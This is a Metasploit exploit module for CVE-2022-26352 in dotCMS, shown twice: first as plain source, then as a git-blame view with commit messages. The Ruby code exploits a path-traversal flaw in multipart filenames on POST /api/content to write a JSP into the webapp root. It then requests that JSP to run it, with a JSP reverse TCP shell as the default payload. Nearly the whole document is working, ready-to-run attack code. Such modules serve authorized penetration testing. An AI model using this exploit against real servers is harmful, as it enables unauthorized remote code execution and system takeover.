modules/exploits/multi/http/dotcms_file_upload_rce.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DotCMS RCE via Arbitrary File Upload.',
        'Description' => %q{
          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the
          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename
          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a
          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get
          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special
          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.
        },
        'Author' => [
          'Shubham Shah',  # Discovery and analysis
          'Hussein Daher', # Discovery and analysis
          'jheysel-r7'     # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2022-26352'],
          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']
        ],
        'Privileged' => false,
        'Platform' => %w[linux win],
        'Targets' => [
          [
            'Java Linux',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'linux'
            }
          ],
          [
            'Java Windows',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ]
        ],
        'DisclosureDate' => '2022-05-03',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    register_options([
      Opt::RPORT(8443),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    test_content = Rex::Text.rand_text_alpha(10)
    test_file = "#{test_content}.jsp"
    test_path = "../../#{test_file}"
    uuid = Faker::Internet.uuid

    jsp = <<~EOS
      <%@ page import=\"java.io.File\" %>
      <%
        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");
        jsp.delete();
      %>
      #{uuid}
    EOS

    vars_form_data = [
      {
        'name' => 'name',
        'data' => jsp,
        'encoding' => nil,
        'filename' => test_path,
        'mime_type' => 'text/plain'
      }
    ]

    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/api/content/'),
      'vars_form_data' => vars_form_data
    )

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, test_file.to_s)
    )

    if res && res.body.include?(uuid)
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def write_jsp_payload
    jsp_path = "../../#{jsp_filename}"
    print_status('Writing JSP payload')
    vars_form_data = [
      {
        'name' => 'name',
        'data' => payload.encoded,
        'encoding' => nil,
        'filename' => jsp_path,
        'mime_type' => 'text/plain'
      }
    ]

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/api/content/'),
      'vars_form_data' => vars_form_data
    )

    unless res&.code == 500
      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')
    end

    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")
    print_good('Successfully wrote JSP payload')
  end

  def execute_jsp_payload
    jsp_uri = normalize_uri(target_uri.path, jsp_filename)
    print_status('Executing JSP payload')
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => jsp_uri
    )

    unless res&.code == 200
      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')
    end
    print_good('Successfully executed JSP payload')
  end

  def exploit
    write_jsp_payload
    execute_jsp_payload
  end

  def jsp_filename
    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"
  end
end
Module working on linux 2022-05-19 09:37:48 -04:00			`##`
			`# This module requires Metasploit: https://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Exploit::Remote`

			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::FileDropper`
dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`prepend Msf::Exploit::Remote::AutoCheck`
Module working on linux 2022-05-19 09:37:48 -04:00
			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
Responded to PR feedback 2022-05-30 14:46:54 -04:00			`'Name' => 'DotCMS RCE via Arbitrary File Upload.',`
Module working on linux 2022-05-19 09:37:48 -04:00			`'Description' => %q{`
			`When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the`
			`file down in a temp directory. In the case of this vulnerability, dotCMS does not sanitize the filename`
			`passed in via the multipart request header and thus does not sanitize the temp file's name. This allows a`
			`specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content) that get`
			`written outside of the dotCMS temp directory. In the case of this exploit, an attacker can upload a special`
			`.jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.`
			`},`
			`'Author' => [`
			`'Shubham Shah', # Discovery and analysis`
			`'Hussein Daher', # Discovery and analysis`
dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`'jheysel-r7' # Metasploit module`
Module working on linux 2022-05-19 09:37:48 -04:00			`],`
			`'License' => MSF_LICENSE,`
			`'References' => [`
			`['CVE', '2022-26352'],`
			`['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']`
			`],`
			`'Privileged' => false,`
			`'Platform' => %w[linux win],`
			`'Targets' => [`
			`[`
Responded to PR feedback 2022-05-30 14:46:54 -04:00			`'Java Linux',`
Module working on linux 2022-05-19 09:37:48 -04:00			`{`
			`'Arch' => ARCH_JAVA,`
			`'Platform' => 'linux'`
			`}`
			`],`
			`[`
			`'Java Windows',`
			`{`
			`'Arch' => ARCH_JAVA,`
			`'Platform' => 'win'`
			`}`
			`]`
			`],`
			`'DisclosureDate' => '2022-05-03',`
			`'DefaultTarget' => 0,`
			`'DefaultOptions' => {`
			`'SSL' => true,`
			`'PAYLOAD' => 'java/jsp_shell_reverse_tcp'`
			`},`
			`'Notes' => {`
			`'Stability' => [CRASH_SAFE],`
			`'Reliability' => [REPEATABLE_SESSION],`
			`'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]`
			`}`
			`)`
			`)`

			`register_options([`
dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`Opt::RPORT(8443),`
			`OptString.new('TARGETURI', [true, 'Base path', '/'])`
			`])`
Module working on linux 2022-05-19 09:37:48 -04:00			`end`

dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`def check`
			`test_content = Rex::Text.rand_text_alpha(10)`
			`test_file = "#{test_content}.jsp"`
			`test_path = "../../#{test_file}"`
Responded to PR feedback 2022-05-30 14:46:54 -04:00			`uuid = Faker::Internet.uuid`

			`jsp = <<~EOS`
			`<%@ page import=\"java.io.File\" %>`
			`<%`
Update modules/exploits/multi/http/dotcms_file_upload_rce.rb 2022-06-01 10:54:02 -04:00			`File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");`
Responded to PR feedback 2022-05-30 14:46:54 -04:00			`jsp.delete();`
			`%>`
			`#{uuid}`
			`EOS`

			`vars_form_data = [`
			`{`
			`'name' => 'name',`
			`'data' => jsp,`
			`'encoding' => nil,`
			`'filename' => test_path,`
			`'mime_type' => 'text/plain'`
			`}`
			`]`

dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`send_request_cgi(`
			`'method' => 'POST',`
			`'uri' => normalize_uri(target_uri.path, '/api/content/'),`
Responded to PR feedback 2022-05-30 14:46:54 -04:00			`'vars_form_data' => vars_form_data`
dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`)`
Responded to PR feedback 2022-05-30 14:46:54 -04:00
dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`res = send_request_cgi(`
			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, test_file.to_s)`
			`)`
Module working on linux 2022-05-19 09:37:48 -04:00
Responded to PR feedback 2022-05-30 14:46:54 -04:00			`if res && res.body.include?(uuid)`
dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`return Exploit::CheckCode::Vulnerable`
			`end`
Responded to PR feedback 2022-05-30 14:46:54 -04:00
dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`Exploit::CheckCode::Safe`
			`end`
Module working on linux 2022-05-19 09:37:48 -04:00
			`def write_jsp_payload`
dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`jsp_path = "../../#{jsp_filename}"`
Module working on linux 2022-05-19 09:37:48 -04:00			`print_status('Writing JSP payload')`
Responded to PR feedback 2022-05-30 14:46:54 -04:00			`vars_form_data = [`
			`{`
			`'name' => 'name',`
			`'data' => payload.encoded,`
			`'encoding' => nil,`
			`'filename' => jsp_path,`
			`'mime_type' => 'text/plain'`
			`}`
			`]`
Module working on linux 2022-05-19 09:37:48 -04:00
			`res = send_request_cgi(`
			`'method' => 'POST',`
			`'uri' => normalize_uri(target_uri.path, '/api/content/'),`
Responded to PR feedback 2022-05-30 14:46:54 -04:00			`'vars_form_data' => vars_form_data`
Module working on linux 2022-05-19 09:37:48 -04:00			`)`

			`unless res&.code == 500`
			`fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')`
			`end`

dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")`
Module working on linux 2022-05-19 09:37:48 -04:00			`print_good('Successfully wrote JSP payload')`
			`end`

			`def execute_jsp_payload`
			`jsp_uri = normalize_uri(target_uri.path, jsp_filename)`
			`print_status('Executing JSP payload')`
			`res = send_request_cgi(`
			`'method' => 'GET',`
dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00			`'uri' => jsp_uri`
Module working on linux 2022-05-19 09:37:48 -04:00			`)`

			`unless res&.code == 200`
			`fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')`
			`end`
			`print_good('Successfully executed JSP payload')`
			`end`

			`def exploit`
			`write_jsp_payload`
			`execute_jsp_payload`
			`end`

			`def jsp_filename`
			`@jsp_filename \|\|= "#{rand_text_alphanumeric(8..16)}.jsp"`
			`end`
			`end`